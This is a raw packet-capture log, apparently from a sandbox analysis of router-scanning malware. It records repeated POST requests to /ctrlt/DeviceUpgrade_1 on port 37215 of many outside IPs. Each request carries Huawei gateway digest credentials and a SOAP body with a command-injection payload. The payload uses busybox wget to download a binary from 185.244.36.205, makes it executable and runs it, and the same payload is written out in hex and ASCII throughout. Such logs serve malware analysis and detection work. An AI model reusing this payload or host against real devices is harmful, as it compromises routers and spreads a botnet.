                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2361192.168.2.154956831.201.206.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469832897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2362192.168.2.154415437.37.54.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.470977068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2363192.168.2.1541044191.147.190.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471014977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2364192.168.2.156008437.22.89.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471111059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2365192.168.2.1556110168.180.71.25337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471129894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2366192.168.2.1540966190.169.40.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471144915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2367192.168.2.155537445.226.216.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471165895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2368192.168.2.153896494.44.168.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471232891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2369192.168.2.154197094.44.190.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471261024 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2370192.168.2.1541756186.4.114.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471349001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
